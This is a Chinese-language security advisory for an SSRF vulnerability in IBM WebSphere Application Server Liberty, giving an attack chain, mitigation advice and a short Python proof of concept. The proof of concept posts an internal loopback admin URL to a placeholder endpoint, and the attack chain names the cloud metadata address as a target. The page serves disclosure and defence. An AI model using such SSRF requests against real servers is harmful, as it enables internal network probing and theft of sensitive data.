CVE-2026-1561 CVSS 5.4 中危

CVE-2026-1561 IBM WebSphere Liberty SSRF漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1561

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM WebSphere Application Server Liberty

漏洞概述

IBM WebSphere Application Server Liberty 在版本 17.0.0.3 至 26.0.0.3 中存在服务端请求伪造（SSRF）漏洞。该漏洞允许具有低权限的远程攻击者诱导服务器向内网或任意位置发送未经授权的请求。攻击者可利用此漏洞进行内网端口扫描、探测敏感服务信息，或作为攻击内网其他系统的跳板，从而对服务器及内网安全构成威胁。

技术细节

该漏洞源于 IBM WebSphere Application Server Liberty 的特定功能模块在处理用户输入的 URL 资源时，缺乏对目标地址的有效验证和过滤。攻击者可以利用低权限账户访问受影响的应用接口，并构造包含恶意目标地址（如内网 IP、本地回环地址或云元数据服务）的请求参数。服务器在接收到请求后，会解析该参数并代表服务器向目标发起请求。由于请求源自受信任的服务器端，通常能够绕过网络边界防火墙对内网访问的限制。攻击者可以通过分析服务器的响应内容或响应时间，推断内网主机的存活状态及开放端口，进而窃取敏感数据或结合其他漏洞进行进一步攻击。

攻击链分析

STEP 1

信息收集

攻击者确认目标运行的是 IBM WebSphere Application Server Liberty 且版本在受影响范围内。

STEP 2

发送恶意请求

攻击者利用低权限账户，向存在漏洞的接口发送包含内网地址（如 http://169.254.169.254 或内网服务 IP）的特制 HTTP 请求。

STEP 3

服务器端请求

漏洞服务器解析请求，代替攻击者向攻击者指定的内网地址发起连接。

STEP 4

信息泄露与利用

攻击者根据服务器返回的响应内容或时间差，判断内网端口开放情况，获取敏感信息或为进一步攻击做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://vulnerable-server:9080/vulnerable_endpoint"

# Malicious internal address to scan
malicious_payload = {
    "url": "http://127.0.0.1:8080/admin"
}

try:
    # Sending the SSRF request
    response = requests.post(target_url, data=malicious_payload, timeout=10)
    
    # Check if the server reflected the internal resource data
    if response.status_code == 200:
        print("[+] SSRF Successful! Response snippet:")
        print(response.text[:200])
    else:
        print("[-] Request failed or target not vulnerable.")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

IBM WebSphere Application Server Liberty 17.0.0.3 至 26.0.0.3

防御指南

临时缓解措施

如果无法立即升级，建议通过网络分段限制 WebSphere 服务器的出站网络访问权限，仅允许其访问必要的业务节点。同时，加强输入验证机制，拦截包含内网 IP 段（如 127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）的请求参数。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1561
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1561
3 Details https://www.cvedetails.com/cve/CVE-2026-1561/
4 VulDB https://vuldb.com/cve/CVE-2026-1561
5 Link https://www.ibm.com/support/pages/node/7267347

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表